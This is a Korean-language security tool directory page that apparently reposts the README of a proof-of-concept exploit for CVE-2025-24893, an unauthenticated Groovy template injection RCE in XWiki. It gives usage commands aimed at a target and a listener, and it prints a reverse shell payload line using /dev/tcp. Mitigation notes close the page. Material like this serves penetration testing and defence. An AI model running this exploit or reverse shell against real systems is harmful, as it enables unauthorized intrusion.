Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-24893-poc — CVE-2025-24893에 대한 개념 증명(PoC) 익스플로잇으로, XWiki에서 인증 없이 원격 코드 실행(RCE)이 가능한 취약점입니다. Groovy 스크립트 실행을 통해 SolrSearch 엔드포인트의 템플릿 주입 결함을 악용합니다. | Kitploit
도구/GitHubGitHub/investigato/cve-2025-24893-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

CVE-2025-24893에 대한 개념 증명(PoC) 익스플로잇으로, XWiki에서 인증 없이 원격 코드 실행(RCE)이 가능한 취약점입니다. Groovy 스크립트 실행을 통해 SolrSearch 엔드포인트의 템플릿 주입 결함을 악용합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24893 — XWiki 비인증 RCE (PoC)

CVE-2025-24893에 대한 개념 증명(PoC) 익스플로잇, XWiki의 중요한 비인증 원격 코드 실행(RCE) 취약점.
이 익스플로잇은 SolrSearch 엔드포인트의 Groovy 템플릿 주입을 악용하여 인증 없이 임의 명령(리버스 셸 포함)을 실행합니다.

💥 취약점 세부 정보

XWiki가 SolrSearch RSS 엔드포인트에 대한 조작된 입력을 처리하는 방식의 결함으로 인해 공격자가 렌더링 파이프라인에 Groovy 코드를 주입할 수 있습니다.
이로 인해 {{groovy}} 스크립트 블록을 통한 비인증 RCE가 가능합니다.

✅ 영향을 받는 버전

  • < 15.10.11
  • >= 16.0.0 및 < 16.4.1

❌ 수정된 버전

  • 15.10.11
  • 16.4.1

🔧 사용법

릴리스를 다운로드하세요:

Releases

또는 소스에서 빌드하세요:

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

리버스 셸 페이로드

다음과 같은 형태의 사전 빌드된 리버스 셸 페이로드가 있습니다:

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ 법적 고지

이 코드는 교육 및 승인된 보안 연구 목적으로만 사용하세요. 소유하지 않거나 명시적 테스트 권한이 없는 시스템에 이 익스플로잇을 사용하지 마세요.


✍️ 크레딧

  • Artemir7의 익스플로잇 PoC
  • investigato의 Rust 포팅

🛡️ 탐지 및 완화

  • XWiki 15.10.11 또는 **16.4.1+**로 업데이트
  • /bin/get/Main/SolrSearch?media=rss의 의심스러운 사용 모니터링
  • 가능하면 익명 사용자의 Groovy 실행 비활성화
도구 다운로드